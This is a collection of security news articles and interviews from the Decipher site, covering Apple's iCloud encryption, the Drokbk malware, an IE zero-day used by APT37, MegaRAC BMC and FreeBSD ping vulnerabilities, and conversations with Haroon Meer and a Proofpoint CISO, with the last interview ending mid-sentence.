<![CDATA[Decipher]]> https://decipher.sc Decipher is an independent editorial site that takes a practical approach to covering information security. Through news analysis and in-depth features, Decipher explores the impact of the latest risks and provides informative and educational material for readers curious about how security affects our world. en-us info@decipher.sc (Amy Vazquez) Copyright 2022 3600 <![CDATA[Apple to Encrypt iCloud Backups, Enable Hardware Security Keys for 2FA]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/apple-to-encrypt-icloud-backups-enable-hardware-security-keys-for-2fa https://duo.com/decipher/apple-to-encrypt-icloud-backups-enable-hardware-security-keys-for-2fa

Security and privacy experts, cryptographers, and customers for years have been urging Apple to implement end-to-end encryption for its iCloud backups, and the company is finally on the cusp of doing so.

By the end of the year, all Apple customers will have the option of enabling Advanced Data Protection for iCloud, which will extend E2EE to iCloud backups, Notes, and photos, along with a few other data categories. The move will eliminate one of the major weak spots in Apple’s data protection infrastructure: the iCloud backups of users’ device data. Right now, those backups are not encrypted, which makes them targets for attackers and also makes them reachable by law enforcement agencies with proper authorization. When users opt in to Advanced Data Protection, that will encrypt those backups and Apple will not have access to the keys to decrypt them.

“Advanced Data Protection is Apple’s highest level of cloud data security, giving users the choice to protect the vast majority of their most sensitive iCloud data with end-to-end encryption so that it can only be decrypted on their trusted devices, said Ivan Krstic, Apple’s head of security engineering and architecture.

The new option is already available to people who are in Apple’s beta program and should be generally available by the end of 2022. The move will not sit well with law enforcement agencies that have relied on access to those iCloud backups for many years.

“In this age of cybersecurity and demands for ‘security by design,’ the FBI and law enforcement partners need ‘lawful access by design,’” the FBI said in a statement to The Washington Post.

Along with the change to iCloud backups, Apple is adding two other security features to its ecosystem, including the ability for people to use hardware security keys as a second factor of authentication when signing into their iCloud accounts. At the moment, Apple’s two-factor authentication system uses SMS, which is much weaker than using a hardware security key.

The third new addition is a feature in iMessage that is designed to prevent attackers from being able to add a new device into an iMessage conversation in order to eavesdrop on it. Both iMessage and FaceTime conversations are encrypted, but an attacker who can gain access to one of Apple’s servers may be able to insert a device into someone else’s private conversations. To defeat this, Apple is introducing iMessage Contact Key Verification.

“Conversations between users who have enabled iMessage Contact Key Verification receive automatic alerts if an exceptionally advanced adversary, such as a state-sponsored attacker, were ever to succeed breaching cloud servers and inserting their own device to eavesdrop on these encrypted communications. And for even higher security, iMessage Contact Key Verification users can compare a Contact Verification Code in person, on FaceTime, or through another secure call,” Apple said.

The key verification feature is meant mainly for high-risk users such as activists, journalists, and celebrities, but will be available to anyone sometime in 2023.

<![CDATA[Cobalt Mirage Actors Deploying Drokbk Malware in Recent Campaigns]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/cobalt-mirage-actors-deploying-drokbk-malware-in-recent-campaigns https://duo.com/decipher/cobalt-mirage-actors-deploying-drokbk-malware-in-recent-campaigns

An Iranian threat group that performs both cyber espionage and financially motivated attacks has been using a piece of malware called Drokbk as part of recent intrusions that rely on GitHub as a dead-drop resolver to communicate new information to infected machines.

Drokbk has been seen in intrusions for the last few months, typically after a threat actor has exploited the Log4Shell vulnerability in VMware Horizon servers. Researchers at Secureworks have been tracking attacks by the threat actor known as Cobalt Mirage that deploy Drokbk after initially exploiting the Log4Shell flaws in Horizon servers, including an intrusion in February at a local government in the United States. Drokbk comprises two main components, a dropper and the main payload, and is used by a specific subgroup of Cobalt Mirage known as cluster B.

“The malware has limited built-in functionality and primarily executes additional commands or code from the command and control (C2) server. Early signs of its use in the wild appeared in a February 2022 intrusion at a U.S. local government network,” a new Secureworks Counter Threat Unit [report] (https://secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver) says.

“SessionService.exe is the main malware payload, and it begins by finding its C2 domain. A C2 domain is often preconfigured in malware. However, Drokbk uses the dead drop resolver technique to determine its C2 server by connecting to a legitimate service on the internet (e.g., GitHub). The C2 server information is stored on a cloud service in an account that is either preconfigured in the malware or that can be deterministically located by the malware. The binary uses the GitHub API to search for the 'mainrepositorytogeta' repository. This code identifies the specific GitHub account and the request used to locate the malware's C2 server. The response is stored within the README.md file hosted on the GitHub account. In this campaign, the threat actor used a GitHub account with the username Shinault23.”

The campaign using this technique likely began in June, as that’s when the first commit to the GitHub repository occurred. Over the next few weeks, the Cobalt Mirage actors changed the C2 domain several different times and many of the domains had been used in other campaigns by Cobalt Mirage cluster B.

Cobalt Mirage is a relatively new threat actor that started operating in early 2021. The group is known to use the BitLocker ransomware and often goes after organizations in the U.S., Israel, and Europe. The actor often exploits known vulnerabilities such as Log4Shell and ProxyShell for initial access is linked to the Iranian military.

<![CDATA[Q&A: Haroon Meer]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/q-and-a-haroon-meer https://duo.com/decipher/q-and-a-haroon-meer

Haroon Meer, founder of Thinkst Applied Research, recently joined Dennis Fisher on the Decipher podcast to talk about recent changes in the security industry, the economic downturn, and how to get value out of conferences. This is an edited and condensed transcript of that conversation.

Dennis Fisher: I was reading this blog post by Mark Curphey from Crash Override talking about this coming security tools crash. And there's a lot of stuff in there about the pullback from VCs, people, companies and founders who, say two years ago, or two and a half years ago, didn't know how long the pandemic was going to last. So they, maybe raised a whole bunch of money for the next couple years. And now those bills are coming due. Right. And as you said, the stock market is going down, the revenue might not be there. So people are going to start looking at all these things that they bought or may have wanted to buy and be like, well, we can't do all of this.

Haroon Meer: I think everybody's been talking about the market correction for security tools. And again, I think the same old curmudgeons who are waiting for the crypto collapse have also been waiting for this right sizing almost like the market has been frothy for too long. Like I've complained about it in the past and not because I have a problem with people getting money. A long time ago, I heard Moxie Marlinspike, he was on a review board for funding security projects. And at some point Moxie says hey, if I'm allocating other people's money out, I'll give money to everyone who wants to do a security project. I'm fine with it, like fund it all. And it's an interesting point, except I think security does have a problem when the markets are frothy, because there's a lot more noise in the system. And it's a lot harder for people, to quote your colleague, Wendy Nather’s line, for people who are on or just below the security poverty line, they can't easily tell the difference between what's just been funded and what actually adds value. And so hopefully, I'm happy with some of that froth getting cleaned up.

But it's hard to tell. Certainly when COVID hit, there were lots of people who were worried about whether security would take a beating. And I don't think it did. I think security was kind of immune to it, for the most part, like people did cuts. But we're scared to cut into security. And so I don't know how much this cut will affect security. I think security needs a little bit of justify your existence. I'm not convinced that it'll hurt. Security seems to be like a cockroach that just survives no matter what.

Dennis Fisher: I think that's true. It's proven to be true in the last 20 years, since cybersecurity really became its own thing, that it's been pretty resistant to most of the severe ups and downs. Part of that is due to just the fact that threats have expanded.

Haroon Meer: The threats went on, the dependency is more real. Like 20 years ago, if stuff went down, it wasn't political. And now stuff goes down. And people don't know what to do with their lives. So I think that's true. Look for us personally, speaking as a vendor, we were lucky, like, we didn't know how things would go during COVID. For us, we had a lot of feedback from people going, Hey, we'll do cuts, but like, we won't cut you guys and impact, like we fought hard. We've never increased our prices, like with Canaries from day one. And, it's the most logical thing to do, the market will tolerate an increase every year. And for us as a company we don't think we need to. I think lots of people will say, so you've got to consider the source. But we focus crazy hard on making sure. Like, we think we are adding fair value. And so even when things get tighter, it's a lot harder for people to go, oh, let's throw that out. Because that's a waste of money. Because mostly we have pretty good value. And we should be good. But what we did see the last time, like, the last time we braced, and it's shockingly small. But we monitored closely. We had about eight companies who pinged us to say listen, they think they're going out of business, or they're just about out of business. And our response to all of them was, hey, we'll carry you for a year. And from all of those, three of them went away, three of them shut their doors. And so that's one of those things that I think is a knock on and may happen this time. Also, anyone who sells ends up selling to a lot of other startups also. And if those startups get shuttered, then there's just a whole lot of money that drains out of the system.

Dennis Fisher: I think some of it in your case, and I can take a few other examples, has to do with just the simplicity of what you guys do. It's so easy to explain in 20 seconds. It's not like well, we have this machine learning model, and then we throw it through this AI algorithm. And then we come out with a network map.

Haroon Meer: There's two interesting things that happen. One is this human nature that says, if you've bought a product, and it's simple, the easiest thing to do is to just keep making it complex. Without it being part of anyone's grand plan, the industry forces you to do this. Like, if I did another podcast interview with you three years later, almost the logical question is, well, what's new in the product? What's the new stuff that you've done? And so people feel forced to show progress by saying, Here's how we've made the simple thing more complex. '' And it's really hard to go, No, we're going to spend a lot of effort making it even simpler. Because if we talk to someone, and they say, what's new, and you go, Oh, that thing that used to take three minutes now takes 30 seconds. It's like, people start asking questions like, no, what are you really doing with your time? And so there's lots of stuff like that, that pushes towards complexity, and we actively fight it as much as we can. And it's very easy to get it wrong.

Dennis Fisher: Part of that is because investors expect a product roadmap that shows some sort of graph that's like, Oh, we're adding new features every quarter. Not every product needs new features, like Oreos don't need more flavors. Chocolate and vanilla. It just works.

"Can you make your customers actually happy instead of dazzling them? Because now, that's the stuff that actually matters."

Haroon Meer: You're right. And it's not just investors. We've got customers now, like, we've been around for a while, right? So we've got customers who liked the stuff, it's worked for them, like it's saved them on their pen tests, it saved them when it mattered. And still, if a new PM comes in, and or some new CEO comes in, it's quite common where they'll go, Okay, show us your roadmap. And you go, yeah, that's not why you use us. Here's the stuff we want to do, here's the direction we are moving in. But the industry is largely conditioned for some things, it will be interesting, because I suspect some of that's going to be changing through this downturn. Like, through this downturn, one of the most interesting things to see has been VC voices that have pivoted very quickly from growth at all costs to sustainability, revenue, reasonable growth. And so part of that thing becomes like, Okay, can you make your customers actually happy instead of dazzling them? Because now, that's the stuff that actually matters? And yeah, I suspect good value and sustainable businesses making a comeback.

Dennis Fisher: And I think simplicity too, right? Like, If you can do one or two or three things very, very well, that have a lot of value, and pare it down to the things that you're best at, you know, is, a lot of times what happens in downturns anyway. Companies look around, and they're like, well, we don't really need all these product lines, or we don't need all these services, or whatever the case may be. Here's the things that make us the most money and the things customers really come to us for. And let's do that. Let's focus on that.

Haroon Meer: Yeah, it'll be interesting to see, it's one of the interesting takes on the VC world is, like, there's a lot of talk about whether the last generation or the last few generations of tech founders have so grown up in a bullish economy that they don't know how to operate under conditions of hardship. And one of the genuine questions like when you look at security products, is, I'm not convinced that lots of people know how to do simple. Simple becomes one of those things that conceptually should be a lot easier. But it's surprisingly hard for people to pull off.

Dennis Fisher: I think there's a whole lot of truth to what you just said, because there is a generation, probably two generations now, of security founders and executives who have grown up in the business since the early 2000s when security took off, and it's kind of just been upward growth since then. If I just take the dumb example of RSA Conference, the first year I went in 2001, there's, I don't know, 1000 people there. Now there's 60,000 people there, right? And like 5000 vendors, and you're just like, What do all these people do? There aren't that many new problems to solve.

Haroon Meer: No. Honestly, it's been interesting for us. So I didn't visit RSA until I did by accident in 2018. And, and it's interesting, like, genuinely, I happen to be in SF at the same time. And I was like, okay, like, let me finally go see this thing. And, ah, it's mind blowing. But it actually did convince me to try it. And we've got this whole long blog post on how RSA has worked out for us. Because it's shockingly good. Like, like RSA as a vendor booth is amazing for us. But there's a few interesting things about it. The one is, like we do it unusually. So we take our developers there, the people who are on the booth floor, our engineers who build it or like, PM. I'm there. And it's always surprising, because customers come by, and we've got tons of customers that we've never met. And the new people come by, and the customers who are there end up saying nice things about us. And so then people buy our stuff. And we focus a lot on doing actual demos at the booth. So anytime you come there, people are demoing the product. And I'm amazed that people don't do this. You see these booths this year, like the past RSA. But there were two booths that had cars, one that had a DeLorean and one that had a race car. And I asked the lady with the race car, why is this here? Are you saying something about the product?

Dennis Fisher: Are you saying we are like a race car, very expensive and easy to break?

Haroon Meer: Yeah, she looked at me like I was the idiot. She was like, What do you mean? Like, here's a race car. And I was like, surely that can't be right. Surely, you've got to link the two, like, why did you do this? Um, no, there's no hint of it. If there's a young security company, and you are interested you should go check out our blog post on it. It surprises me and the young me hates that. It's true. But it's shockingly good for us.

Dennis Fisher: There's lots of things that our younger selves would hate us for.

Haroon Meer: Yes, yes.

Photo: Mohamed Nanahbay, CC by 2.0 license.

<![CDATA[North Korean APT37 Used Internet Explorer Zero Day]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/north-korean-apt37-used-internet-explorer-zero-day https://duo.com/decipher/north-korean-apt37-used-internet-explorer-zero-day

A North Korean threat actor known for targeting victims in South Korea has been caught using an exploit for a zero day vulnerability in Internet Explorer by delivering malicious Microsoft Office documents.

Researchers with Google’s Threat Analysis Group discovered the vulnerability (CVE-2022-41128) on Oct. 31 after several people uploaded the malicious Office documents to VirusTotal. After analyzing the documents, the TAG researchers found that the documents download another file that then contacts a remote server to bring down some HTML code. The malicious documents used the Halloween incident in Seoul as a lure to entice victims to open them.

TAG reported the vulnerability to Microsoft, which released a fix for it on Nov. 8.

“The document downloaded a rich text file (RTF) remote template, which in turn fetched remote HTML content. Because Office renders this HTML content using Internet Explorer (IE), this technique has been widely used to distribute IE exploits via Office files since 2017 (e.g. CVE-2017-0199). Delivering IE exploits via this vector has the advantage of not requiring the target to use Internet Explorer as its default browser, nor to chain the exploit with an EPM sandbox escape,” a post by TAG researchers Clement Lecigne and Benoit Sevens says.

“Upon investigation, TAG observed the attackers abused an 0-day vulnerability in the JScript engine of Internet Explorer.”

The exploit that the attackers used is designed to bypass the protection that Internet Explorer has for opening potentially dangerous content downloaded from the internet.

“When delivering the remote RTF, the web server sets a unique cookie in the response, which is sent again when the remote HTML content is requested. This likely detects direct HTML exploit code fetches which are not part of a real infection,” the researchers said.

“The exploit JavaScript also verifies that the cookie is set before launching the exploit. Additionally it reports twice to the C2 server: before launching the exploit and after the exploit succeeds.”

APT37 is also known as Reaper and the group is mainly known for conducting cyber espionage campaigns directly aligned with the North Korean government’s interests. The group has used zero days in operations in the past, including CVE-2020-1380, which the group used last year.

<![CDATA[Decipher Podcast: Haroon Meer Returns]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/decipher-podcast-haroon-meer-returns https://duo.com/decipher/decipher-podcast-haroon-meer-returns

<![CDATA[Trio of MegaRAC BMC Flaws Could Have Long Range Effects]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/trio-of-megarac-bmc-flaws-could-have-long-range-effects https://duo.com/decipher/trio-of-megarac-bmc-flaws-could-have-long-range-effects

There are three vulnerabilities in the MegaRAC baseboard management controller (BMC) firmware that is used in a huge number of data centers and cloud platforms that could present a serious, long-term threat to those environments as well as enterprises that run their own affected servers.

MegaRAC BMC is among the more widely used BMC firmwares on the market, and is used by a wide range of server manufacturers, including AMD, HP Enterprise, Lenovo, Dell EMC, and Huawei. BMCs are essentially a separate computer that sits on the server and is used to provide a management channel. It typically includes its own networking stack, firmware, and other components, and gives an administrator the ability to manage all aspects of the server’s functionality from a separate management interface. So an attacker who is able to gain privileged access to a server's BMC would be in a powerful position on the box.

The flaws in the MegaRAC BMC that researchers at Eclypsium discovered include a critical arbitrary code execution vulnerability (CVE-2022-40259) in the Redfish API in MegaRAC that is trivially exploitable and would give an attacker complete control of the BMC firmware. The attacker would only require remote access to the BMC interface, which ideally should not be exposed to the Internet, and at least some low-level privileges on the BMC. But if those conditions are present, then an attacker would have little trouble.

The long-term risk from these issues comes from the fact that MegaRAC is present in such a long list of servers and getting updated BMC firmware to all of those machines, especially in massive data centers.

“MegaRAC BMC firmware is one of the common threads that connects much of the hardware that underlies the cloud. As a result, any vulnerability in MegaRAC can easily spread through the extended supply chain to affect dozens of vendors and potentially millions of servers. Additionally, in order to abstract computing from the hardware, it is critical that the physical servers within a data center are interchangeable,” the Eclypsium blog post on the flaws says.

“To this end, cloud providers standardize on server components, hardware configurations, firmware & operating system versions, and hypervisor software. So if a vulnerable BMC is used in a data center environment, it is highly likely that hundreds or thousands of devices will share that same vulnerability. In the context of an attack, this could potentially put entire clouds at risk.”

Eclypsium researchers discovered the three vulnerabilities earlier this year after discovering some data from MegaRAC manufacturer American Megatrends Inc. online. After looking at the data, they realized it was legitimate and began looking for potential vulnerabilities. They eventually focused their attention on the Redfish API, which is a standard for the management of hybrid environments and data centers. The arbitrary code execution bug is the most serious of the three, and the Eclypsium researchers developed a working exploit for it.

“To find this issue, initially we reviewed for potentially dangerous calls such as command execution calls. We narrowed it down only to calls exposed to the user, and there was one sitting in the Redfish API implementation. The only complication is the attack sits in the path parameter, but it is not URL-decoded by the framework, so the exploit needs to be crafted specially to both be valid per URL and valid per bash shell command,” the researchers said.

“Organizations with large server farms, data centers, and potentially cloud and hosting providers are particularly vulnerable for this kind of exploit."

The other two flaws are less serious but still could present problems. One is the presence of default user credentials (CVE-2022-40242), and the other is the ability to enumerate users through the API (CVE-2022-2827).

“The vulnerabilities can be exploited by any remote attacker having access to remote management interfaces (Redfish, IPMI). The impact of exploiting these vulnerabilities includes remote control of compromised servers, remote deployment of malware, ransomware and firmware implants, and server physical damage (bricking),” Nate Warfield, director of threat research and intelligence at Eclypsium, said.

“Organizations with large server farms, data centers, and potentially cloud and hosting providers are particularly vulnerable for this kind of exploit. Attack scenarios could be as simple as attackers using CVE-2022-40242 (default superuser credentials) to login to affected servers, or a more complex scenario could be using CVE-2022-2827 to find a user account, then use brute force attacks/credential stuffing to determine the password. From there, CVE-2022-40259 could be exploited as it only requires a user account with privilege level higher than ‘None’.”

Eclypsium reported the vulnerabilities to AMI and updates from server manufacturers likely will be forthcoming. Warfield said they are not aware of any evidence of attackers exploiting these flaws in the wild, and GreyNoise, which monitors the Internet for exploit traffic, said it has not seen any IP addresses attempting to exploit these flaws, either.

<![CDATA[FreeBSD Patches RCE Flaw in Ping]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/freebsd-patches-rce-flaw-in-ping https://duo.com/decipher/freebsd-patches-rce-flaw-in-ping

All supported versions of FreeBSD are vulnerable to a potential code execution bug in the ping service that an attacker can trigger remotely.

The vulnerability is a stack buffer overflow and the maintainers of FreeBSD have released updates for all of the affected versions that resolve the issue. Ping is a utility present in many systems that is used to determine whether a given host is reachable. It relies on the ICMP protocol and sends ICMP packets to a given remote host and listens for a reply to see whether that host is reachable on the network.

The vulnerability (CVE-2022-23093) is a result of the way that ping handles some headers.

“Ping reads raw IP packets from the network to process responses in the pr_pack() function. As part of processing a response ping has to reconstruct the IP header, the ICMP header and if present a "quoted packet," which represents the packet that generated an ICMP error. The quoted packet again has an IP header and an ICMP header,” the FreeBSD advisory says.

“The pr_pack() copies received IP and ICMP headers into stack buffers for further processing. In so doing, it fails to take into account the possible presence of IP option headers following the IP header in either the response or the quoted packet. When IP options are present, pr_pack() overflows the destination buffer by up to 40 bytes.”

The most likely result of an attacker triggering this vulnerability is that the ping process would crash, but it may also be possible for an attacker to gain remote code execution. There are no known workarounds for the issue, so the best course of action is to upgrade to the latest, fixed release of FreeBSD. The fixed releases are 13.1 and 12.4.

<![CDATA[Q&A: Lucia Milica]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/q-and-a-lucia-milica https://duo.com/decipher/q-and-a-lucia-milica

Lucia Milica, global resident CISO at Proofpoint, talks about how the CISO role has evolved and the challenges that CISOs face when interacting with the leadership team. Below is a transcribed version of the interview, which is part of a series of conversations by Decipher with CISOs across the security industry.

Lindsey O'Donnell-Welch: I would love to hear more about your own background.

Lucia Milică: So for me, I started into this space very early on, I began coding when I was 12. I am born and raised in Romania. So I began coding at 12. And I studied computer science in high school, I moved to the Bay Area very early on, and my first job was doing Y2K compliance for Wells Fargo Bank. So that was sort of the beginning, into the tech sector. But I think what's unique about my skill set, I'm passionate about law and technology. I love them both equally. Cybersecurity and privacy are both very near and dear to my heart. Now, taking a step back and looking back when I first started, I wouldn't necessarily have thought that I would end up in cybersecurity, primarily because cybersecurity was not a defined space nearly 30 years ago. So technology was a big area of influence. And for me, it was really the blend of technology, business, and law that I think ultimately have led me to where I am today.

I do feel that in many ways, I am a product of the CISO evolution, just kind of reflecting back at my career. So as I mentioned, I started early on doing coding, I got into IT infrastructure, so started as a systems engineer, as a sysadmin first, and over time, sort of graduated to a systems engineer role, like everybody else early in the days in the 90s, spent a lot of time with the MCSE certifications, and all the various different technology that sort of brought me up to being a systems engineer. But if I kind of take a step back and look at the pivotal steps, it's really moving in from systems engineering to more specifically around Active Directory and Exchange. And if we think of the threat landscape today, email is still one of the top threat vectors across the board and I've been focusing so much as an Active Directory engineer and expert, it was very much focused around access controls, authorization needs based permission, RBAC, I spent many years doing RBAC implementations. And this is way before we talked about needs-based permissions. So that was a big stepping stone. From there it was always a natural progression towards eDiscovery, and records retention. And it was probably my love for law in the background that has played a little bit into that. I didn't go to law school until years later. But at the same time, while I worked full time, I went to school at night. So all of my degrees were done as I continued to grow and progress in my career. And I feel like each one of my degrees really helped from undergrad to my MBA to my JD later on, and Masters in cyber, they all helped along the way with putting the business in perspective and understanding both the tech and the business side of the equation and really honing into the risk. But as I moved on from the natural extension from email, and running Exchange systems and architecting new technology, that sort of morphed over time to, as I mentioned, e-discovery and that investigation side of the house. I think that first stepping stone towards security, it was still very early on, and that sort of move towards more investigations, Governance Risk and Compliance became a big piece of it. But then from there, the next piece was getting more involved into M&A and integration as a result of M&A, that came into who's accessing what, network connectivity, safety, etc. to IP protections or intellectual property protections, and over time, got into running a lot more of the IT infrastructure space and being the only person with a security background in the room, it was a natural progression in my career into, you know, taking over security, taking over intellectual property. It was around that time when I started law school, that a lot was happening around data, supply chain vendor risk became a bigger concern. And I was one of those people that raised my hand to take it over. Like, let me figure it out first. So through that, they all helped more the CISO that I later became, but those are all I think, stepping stone that that made me a well rounded technology and business leader, where I could bring all of those pieces into one.

Lindsey O'Donnell-Welch: Was there any pivotal moment that made you decide to go down the CISO track?

Lucia Milică: That's probably now about 10 plus years ago. So at the time, I was running security without the CISO title. So I built security from the ground up, I was the security person and the privacy person, but I just had a VP of infrastructure type of role. And it was that time that I got more and more down to the data governance track, that I realized that okay, this is a conflict of interest, it was probably very early on and it was in law school, that I started thinking more in terms of risk, probably was my first year of law school, that I raised my hand to my CIO, and I said, "Look, I can do it all, so there's not a problem. Can I do it?" I believe that it is not right for me to own everything. I think we're getting into a point of conflict of interest. And if I am to take those like, which side do you want to be? Do you want to have security only, do you want to have security and privacy, privacy only or IT infrastructure, and that was a pivotal moment, when I said, "Well, I love IT infrastructure." And at that point, I was in it for over 20 years. So that's how long that's been. I felt like I knew IT. But security and privacy were something that I was so passionate about it, that's when I basically raised my hand and said, "I would love to just own security and privacy." And we need the right checks and balances, we need to ensure that we there is no conflict of interest in between. But I can put in all of those processes. And at the time, I was building data governance and overall security and privacy governance and implementing ISO 27001. And I was going through the various different layers of protection and checks and balances, it was very clear that I needed to decouple my ownership of IT infrastructure from the security side. And that was probably while I was trying to do everything prior to that, that was a defining moment where I said, "I'm only going to do this, this is where my passion lies. And this is where I think I can be more impactful for the organization."

Lindsey O'Donnell-Welch: What are some of your responsibilities?

Lucia Milică: So I'll tell you my day to day in my previous role compared to my day to day in this role, because I think it's really important. So in my previous role, I own all aspects of data privacy and security, from corporate security to product security. So DevSecOps, privacy and security by design, and data governance, across the board and a day in the life was anything from meeting with execs trying to drive product consensus, trying to drive a culture of security, understanding what are the business goals and trying to achieve how I could enable those business goals securely, and really sort of that building that consensus and risk profile for the organization. I do feel that an effective CISO should have a strong business acumen. And so a lot of my job was probably interacting with the executive team and their deputies, their direct reports in the organization in terms of driving awareness, data ownership, controls, etc. And then there's the other aspect of it, of course, is you're always on call 24/7, working with your security operations team, making sure they have the eyes on the glass to see what's happening. So sort of a constant shift between business strategy, business enablement to threats and trying to make those decisions in near real time. Now, fast forward to today, in my current role, I run a team of advisory CISOs across the globe, so I don't have the internal operations responsibility as I did in the previous role. In this role, I'm primarily focused on the eight CISOs in my team around the globe, and we spend our time advising customer CISOs across the globe, which is a value-add for them as being customers, around what is top of mind, what are the top threats, what are some of the best practices that we as operational CISOs - every one of this was my team had been operational CISOs prior, so they've had experience in those roles - our CISO community broadly, in terms of what's top of mind, what are some of those best practices? So a lot of what I do today is coaching and educating... and it doesn't matter where you are on the spectrum, I can be talking to a Fortune 10 global CISO or I can talk to someone where the company has 3,000 to 5,000 employees, right? So doesn't really matter for us aware on the scale, but if someone has a challenge or a program, they're trying to undertake, like, "hey, I need better board metrics, you know, what are some of the other CISOs doing? What are your best practices? What have you learned about it? Can you help me on my board deck?" As an example, or "I'm undertaking a Data Governance Program end to end, what have you learned? Or what are others doing? How have you tackled this challenge? How are you working with execs?" So it's really being that trusted partner and sounding board to our overall sense of community that set the core of my role today. And that has been definitely a shift in mentality when I took this role. I wasn't quite 100 percent sure that this was the right next steps, but I was very much driven by wanting to be impactful, and be able to help more than one company at a time. Being in the operational role was fantastic, right? Because you can get into the depth of that technology can really shape how you mature the security program and drive the culture of security. But you do so one company at a time. So that's time that you invest in transforming that program; in this role, it gives me the opportunity to impact more than one company at a time. And really, I wanted to, to use my knowledge and experience to be impactful and be able to give back to the CISO community.

"I do feel that in many ways, I am a product of the CISO evolution, just kind of reflecting back at my career."

Lindsey O'Donnell-Welch: How has the job of CISO evolved over time?

Lucia Milică: Yeah, so it's interesting. And I think I mentioned earlier that I do feel that I am the product of the CISO evolution. Over time - it was maybe 20, 25 years ago when I started what was a very technical role - you probably know that the CISO title did not really exist. It was just a portion of someone's responsibility, which was the case for me. So that role, I think, has started as a traditional technical role to what now has shifted to more of a business and a risk role. And while you still have to have the technical acumen, I think there's still a stronger need for business and risk acumen and being able to communicate. But just thinking through the last 10 years, the role and complexity has changed and morphed, while we traditionally just focused on intrusion, perimeter-first technology, to a business enablement role. The digital transformation has really accelerated business enablement for a lot of organizations, but brought with it a number of more complexities. We live in a very decentralized mesh technology world, and so is the data. And when you add to that the sophistication and volume of cyber attacks that we have seen over the last several years, it really has elevated that cybersecurity role to the board level in most recent years, but also the skill set that are required for a CISO to be successful in their role, shifted from needing to understand industry to now needing to understand framework and policy and governance and oversight and geopolitical issues, nation state attacks, to business enablement to rapid emerging tech, as just a few of the examples of how this role has changed. Now, in addition to that, you have to think through what is your impact for the company's bottom line, the P&L? Cyber risk is business risk. And it's really important that a CISO is able to understand the business goals, understand the board's responsibility for creating shareholder value and be able to enable the business to achieve those goals while doing so securely. So those conversations were not taking place, 15, 20 years ago - not even 10 years ago - right? We started seeing that shift. But that has really been drastically accelerated over the last several years due to the digitization and commercialization of our overall business systems that we heavily rely on to enable businesses.

Lindsey O'Donnell-Welch: Do you see a future evolution of the CISO role continuing in the future?

Lucia Milică: Oh, absolutely. And we've seen a number of headlines, of course, in the news recently. Gartner came out and said that they expect that by year 2025 that cybersecurity will become a priority for boards, which it absolutely has become - and I'll give you some stats from the recent board of directors survey that we conducted - But also they said by year 2025, 40 percent of boards will have dedicated cyber committees or at least one qualified board member overseeing cyber risk in their organization. We have started seeing, for example, the Delaware Supreme Court Justice Chief Justice Collins Seitz said that boards must be able to demonstrate proactively they that they are thinking about systemic risk within the organization. Twitter, of course, we had Mudge's testimony from the Senate about the capability of the executive team to understand the scope of cyber risk broadly, you had the SolarWinds shareholder derivative. I mean, there's so many different breadcrumbs throughout. We recently conducted our Cybersecurity: The 2022 Board Perspective, where we surveyed 600 board members from organizations of 5,000 employees and higher, in asking about trying to understand their sentiment, vis-a-vis cybersecurity, but also how do they engage with their CISO, what did they value most in the CISO, etc. And a few other stats that I think are really important is that while CISOs and board members came from different backgrounds, diverse backgrounds, they're really bringing a different color of their overall perception of risk broadly. And so one example is the disconnect between CISOs and boards when it comes to security. We've seen in this report that 65 percent of board members globally believe that their organization is at risk of material cyber attacks in the next 12 months. And that compares to 48 percent of CISOs. So those numbers are a little bit different. Now in the U.S. specifically, this disconnect is even higher amongst all the countries that we surveyed, we have 78 percent of boards as opposed to 34 percent of CISOs. So you've seen some example of that disconnect between CISOs and boards.

Lindsey O'Donnell-Welch: What are the top challenges that CISOs face in interacting with board members or other C-Suite executives?

Lucia Milică: Absolutely, I think there are a number of other challenges. So, one of the questions that we had is about seeing eye to eye with their CISO, we asked the same question of the boards. And of course, you have a higher number, and I don't recall exactly the number, but there was somewhere in the 60th percentile of board members believe that they see eye to eye with their CISOs versus only 51 percent of CISOs believe that they see eye to eye with their boards. And there are a number of other stat throughout. But to me it really goes to the communication disconnect that we have. And it's no surprise that we saw the Gartner prediction that proposed SEC cyber rules that are slated to come out in April 2023. So the jury's out about what that final rule will look like, however, something that is clear is that we've seen a trend of the need for cybersecurity expertise on boards. And while of course, you know, board members have a wide array of experience and knowledge, etc. Cyber Risk is a complex topic, it really does require a good level of understanding on how this manifests down the rabbit hole to truly ascertain the full systemic risk impact that cybersecurity can have on the broader organization, but also the ecosystem outside. I mean, take for example, you know, SolarWinds and how that had ripple effects with their customers across the environment. And we've seen that with Log4j and Follina, and some of the other ones as examples of how this can get out of control really quick. So, being able to truly ascertain cyber risk as part of your broader business risk is not only a communication matter, but it's also the ability to understand and absorb that information. And I think you'll need a little bit of both. While CISOs need to continue working on translating technology and technical risk into business risk and be able to better deliver that risk story to their board, at the same token the other side of the aisle, right, we need the board to be able to understand the true implication of of cyber risk on on the ultimate shareholder value and business goals.

"Cyber Risk is a complex topic, it really does require a good level of understanding on how this manifests down the rabbit hole to truly ascertain the full systemic risk impact that cybersecurity can have on the broader organization, but also the ecosystem outside."

Lindsey O'Donnell-Welch: When you're looking at a business do you have this concept of security-focused culture in mind? Do you start there and who needs to be involved in those conversations?

Lucia Milică: So for me, it starts at the top. You have to have the support of the executive team. So it's interesting, right? Because while you have a number of boards and execs that understand that cybersecurity matters, there is a difference between knowing that it's important and actually prioritizing. So to me, it's really, really imperative that you have the right support at the top, that you have the right executive backing, to be able to be impactful and make a difference. Now, successful CISOs able to build and drive that culture broadly around organizations, there's a lot of awareness and education that needs to happen, that can be abrasive or can be mandated, right? So while you need to have that support, you need to do so in a way that you can look not only on the bottom line, but how are you able to enable your end users and the broader employee community to do their jobs and do so securely? Their role is not to understand all the intricacies of security risk. And while it's important, cybersecurity is everyone's job, and everybody's responsibility, and driving that culture is easier said than done, right? Because it takes time, it's multi year, and it has to be multifaceted. At the same token, we can't expect every one of our employees to be cybersecurity experts. So that has to be somewhere in between, in the middle between driving the culture, driving awareness and building those behaviors over time and understanding the user behavior. There are also aspects of it to where you have to be able to implement the right controls, to pick up everything else, so that users can do their their job securely. But it really has to start at the top, 